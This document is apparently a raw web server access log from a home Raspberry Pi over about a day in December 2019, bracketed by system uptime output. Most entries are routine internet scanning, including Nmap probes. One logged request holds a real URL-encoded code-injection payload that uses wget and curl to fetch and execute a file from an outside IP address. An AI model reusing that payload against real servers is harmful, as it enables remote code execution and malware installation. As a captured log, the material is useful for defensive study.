Thu Dec 12 06:25:05 MST 2019 06:25:05 up 5:18, 1 user, load average: 0.52, 0.32, 0.29 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 00:59 7:07m 9.20s 0.31s /usr/bin/lxsession -s LXDE-pi -e LXDE 128.14.133.58 - - [12/Dec/2019:13:28:20 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 " 192.241.241.206 - - [12/Dec/2019:17:20:12 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 192.241.241.206 - - [12/Dec/2019:17:20:13 +0000] "GET / HTTP/1.0" 200 25000 "" "" 71.6.232.9 - - [12/Dec/2019:17:47:24 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36" 88.247.180.236 - - [12/Dec/2019:18:35:51 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 78.70.52.57 - - [12/Dec/2019:19:20:53 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 139.162.119.197 - - [12/Dec/2019:19:30:28 +0000] "GET / HTTP/1.1" 200 25000 "" "HTTP Banner Detection (https://security.ipip.net)" 188.136.168.198 - - [12/Dec/2019:19:48:20 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 188.136.168.107 - - [12/Dec/2019:19:48:26 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 208.97.139.102 - - [12/Dec/2019:21:34:02 +0000] "GET /?search[send][]=eval&search[send][]=Kernel.fork%20do%60wget%20http%3A%2F%2F145.249.106.241%2Frichard%3B%20curl%20-O%20http%3A%2F%2F145.249.106.241%2Frichard%3B%20chmod%20%2Bx%20richard%3B%20sh%20rich HTTP/1.0" 200 25000 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 208.97.139.102 - - [12/Dec/2019:21:34:02 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 93.104.211.173 - - [12/Dec/2019:21:46:35 +0000] "GET / HTTP/1.1" 200 25000 "" "" 93.104.211.173 - - [12/Dec/2019:21:46:35 +0000] "GET / HTTP/1.1" 200 25000 "" "" 93.104.211.173 - - [12/Dec/2019:21:46:35 +0000] "GET / HTTP/1.1" 200 25000 "" "" 82.117.197.102 - - [12/Dec/2019:22:35:17 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 131.0.95.249 - - [12/Dec/2019:22:43:03 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 61.219.11.153 - - [12/Dec/2019:23:23:38 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 106.75.64.59 - - [13/Dec/2019:00:55:48 +0000] "GET / HTTP/1.0" 200 25000 "" "" 120.52.152.20 - - [13/Dec/2019:00:55:50 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" 45.143.221.27 - - [13/Dec/2019:01:48:24 +0000] "GET / HTTP/1.1" 200 25000 "" "libwww-perl/6.43" 45.227.255.233 - - [13/Dec/2019:02:52:30 +0000] "GET / HTTP/1.0" 200 25000 "" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/75.0.3770.100 Safari/537.36" 163.172.120.137 - - [13/Dec/2019:03:52:48 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 200.218.243.33 - - [13/Dec/2019:04:51:36 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 185.244.234.203 - - [13/Dec/2019:06:08:41 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 66.240.205.34 - - [13/Dec/2019:07:12:36 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 192.119.84.87 - - [13/Dec/2019:07:59:18 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36" 65.187.53.105 - - [13/Dec/2019:08:11:30 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 172.105.11.111 - - [13/Dec/2019:08:22:15 +0000] "GET / HTTP/1.0" 200 25000 "" "" 77.236.233.228 - - [13/Dec/2019:08:56:52 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 107.6.150.242 - - [13/Dec/2019:09:52:01 +0000] "GET /.well-known/security.txt HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 " 164.52.24.163 - - [13/Dec/2019:10:23:44 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 92.245.175.39 - - [13/Dec/2019:11:50:34 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 39.100.79.25 - - [13/Dec/2019:12:16:37 +0000] "GET / HTTP/1.0" 200 25000 "" "" 39.100.79.25 - - [13/Dec/2019:12:16:54 +0000] "POST /sdk HTTP/1.1" 404 0 "" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)" 39.100.79.25 - - [13/Dec/2019:12:16:54 +0000] "GET /nmaplowercheck1576239413 HTTP/1.1" 404 0 "" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)" 39.100.79.25 - - [13/Dec/2019:12:16:54 +0000] "GET / HTTP/1.0" 200 25000 "" "" 39.100.79.25 - - [13/Dec/2019:12:16:54 +0000] "GET / HTTP/1.1" 200 25000 "" "" 39.100.79.25 - - [13/Dec/2019:12:16:54 +0000] "GET /evox/about HTTP/1.1" 404 0 "" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)" 39.100.79.25 - - [13/Dec/2019:12:16:55 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 39.100.79.25 - - [13/Dec/2019:12:16:56 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 39.100.79.25 - - [13/Dec/2019:12:16:56 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 39.100.79.25 - - [13/Dec/2019:12:17:03 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 39.100.79.25 - - [13/Dec/2019:12:17:04 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 39.100.79.25 - - [13/Dec/2019:12:17:04 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 39.100.79.25 - - [13/Dec/2019:12:17:05 +0000] "GET / HTTP/1.1" 200 25000 "" "curl/7.38.0" 192.119.84.22 - - [13/Dec/2019:13:22:59 +0000] "GET /login/submit/onlyy HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36" Fri Dec 13 06:25:05 MST 2019 06:25:05 up 1 day, 5:18, 1 user, load average: 0.39, 0.30, 0.34 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 Thu00 31:07m 48.10s 0.69s /usr/bin/lxsession -s LXDE-pi -e LXDE